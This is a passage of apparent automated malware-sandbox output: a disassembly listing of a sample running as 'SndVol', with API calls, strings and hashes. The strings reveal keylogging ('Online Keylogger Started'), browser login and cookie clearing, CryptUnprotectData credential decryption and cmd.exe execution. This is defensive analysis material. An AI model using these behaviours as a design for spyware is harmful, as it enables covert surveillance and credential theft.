                                                                    • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                    • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                    • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                  • _wcslen.LIBCMT ref: 00419744
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                  • String ID: .exe$program files (x86)\$program files\
                                                                  • API String ID: 37874593-1203593143
                                                                  • Opcode ID: 65ae59b11d5d2e675a1ca71ba125b81329312c45fdbbab87bed92ba3827f8aff
                                                                  • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                                                  • Opcode Fuzzy Hash: 65ae59b11d5d2e675a1ca71ba125b81329312c45fdbbab87bed92ba3827f8aff
                                                                  • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                  • wsprintfW.USER32 ref: 0040A13F
                                                                    • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EventLocalTimewsprintf
                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                  • API String ID: 1497725170-1359877963
                                                                  • Opcode ID: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
                                                                  • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                                                  • Opcode Fuzzy Hash: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
                                                                  • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                                                  APIs
                                                                    • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                    • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 00409EB7
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 00409EC3
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                  • String ID: Online Keylogger Started
                                                                  • API String ID: 112202259-1258561607
                                                                  • Opcode ID: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
                                                                  • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                                                  • Opcode Fuzzy Hash: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
                                                                  • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: CryptUnprotectData$crypt32
                                                                  • API String ID: 2574300362-2380590389
                                                                  • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                                                  • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                                                  • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                                                  • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                                                  • CloseHandle.KERNEL32(?), ref: 004051AA
                                                                  • SetEvent.KERNEL32(?), ref: 004051B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                  • String ID: Connection Timeout
                                                                  • API String ID: 2055531096-499159329
                                                                  • Opcode ID: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
                                                                  • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                                                  • Opcode Fuzzy Hash: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
                                                                  • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                                                  APIs
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Exception@8Throw
                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                  • API String ID: 2005118841-1866435925
                                                                  • Opcode ID: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                                                  • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                                                  • Opcode Fuzzy Hash: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                                                  • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExecuteShell
                                                                  • String ID: /C $cmd.exe$open
                                                                  • API String ID: 587946157-3896048727
                                                                  • Opcode ID: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
                                                                  • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                                                  • Opcode Fuzzy Hash: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
                                                                  • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                  Strings
                                                                  • http\shell\open\command, xrefs: 00412026
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: http\shell\open\command
                                                                  • API String ID: 3677997916-1487954565
                                                                  • Opcode ID: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
                                                                  • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                                                  • Opcode Fuzzy Hash: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
                                                                  • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                                                  APIs
                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004721E8), ref: 0041220F
                                                                  • RegSetValueExW.ADVAPI32(00472200,00000000,00000000,?,00000000,00000000,00472200,?,?,00000001), ref: 0041223E
                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00412249
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateValue
                                                                  • String ID: pth_unenc
                                                                  • API String ID: 1818849710-4028850238
                                                                  • Opcode ID: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
                                                                  • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                                                  • Opcode Fuzzy Hash: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
                                                                  • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                                                    • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                                                    • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                  • String ID: bad locale name
                                                                  • API String ID: 3628047217-1405518554
                                                                  • Opcode ID: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                                                  • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                                                  • Opcode Fuzzy Hash: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                                                  • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,0045A35C,00000000,?,?,?,04921583,00000000,?,04921523,00000000,0046B4F8,0000000C,0492167A,00000000,00000002), ref: 049215F2
                                                                  • GetProcAddress.KERNEL32(00000000,0045A374), ref: 04921605
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,04921583,00000000,?,04921523,00000000,0046B4F8,0000000C,0492167A,00000000,00000002), ref: 04921628
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: ou
                                                                  • API String ID: 4061214504-3837949563
                                                                  • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                  • Instruction ID: 6262d5a95e89d724bcb5f2bf10bf7adcf87cf441f26b501bf2a3a921759e7860
                                                                  • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                  • Instruction Fuzzy Hash: 24F0AF30A00218BBCB119BA0DD09BAEBFB9EB04716F5501B5F805A22A1DF74DE54CA98
                                                                  APIs
                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                                                  • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateValue
                                                                  • String ID: P0F
                                                                  • API String ID: 1818849710-3540264436
                                                                  • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                                                  • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                                                  • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                                                  • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                  • API String ID: 2574300362-1519888992
                                                                  • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                                                  • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                                                                  • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                                                  • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __alldvrm$_strrchr
                                                                  • String ID:
                                                                  • API String ID: 1036877536-0
                                                                  • Opcode ID: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
                                                                  • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                                                  • Opcode Fuzzy Hash: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
                                                                  • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                                                  • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                                                  • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                                                  • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                                  • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                                                  • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                                  • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3360349984-0
                                                                  • Opcode ID: 2c3cad1dadf47ab8c55b502a02f4425492f538b35a08a1ca8fb935e7fb0ba5a8
                                                                  • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                                                                  • Opcode Fuzzy Hash: 2c3cad1dadf47ab8c55b502a02f4425492f538b35a08a1ca8fb935e7fb0ba5a8
                                                                  • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                                                                  APIs
                                                                  Strings
                                                                  • Cleared browsers logins and cookies., xrefs: 0040B036
                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                  • API String ID: 3472027048-1236744412
                                                                  • Opcode ID: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
                                                                  • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                                                  • Opcode Fuzzy Hash: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
                                                                  • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                                                  APIs
                                                                    • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                                                    • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                                                    • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                  • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseOpenQuerySleepValue
                                                                  • String ID: H"G$exepath$!G
                                                                  • API String ID: 4119054056-2148977334
                                                                  • Opcode ID: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
                                                                  • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                                                  • Opcode Fuzzy Hash: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
                                                                  • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                                                  APIs
                                                                    • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                                                    • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                                                    • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                                                  • Sleep.KERNEL32(000001F4), ref: 0040955A
                                                                  • Sleep.KERNEL32(00000064), ref: 004095F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                  • String ID: [ $ ]
                                                                  • API String ID: 3309952895-93608704
                                                                  • Opcode ID: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
                                                                  • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                                                  • Opcode Fuzzy Hash: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
                                                                  • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                                                  • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                                                  • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                                                  • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                                                  • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                                                  • Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                                                  • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                                                  • GetLastError.KERNEL32(?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3177248105-0
                                                                  • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                  • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                                                  • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                  • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041A23C
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041A261
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041A26F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                  • String ID:
                                                                  • API String ID: 3919263394-0
                                                                  • Opcode ID: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
                                                                  • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                                                  • Opcode Fuzzy Hash: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
                                                                  • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                                                  APIs
                                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                                                    • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                                                  Memory Dump Source
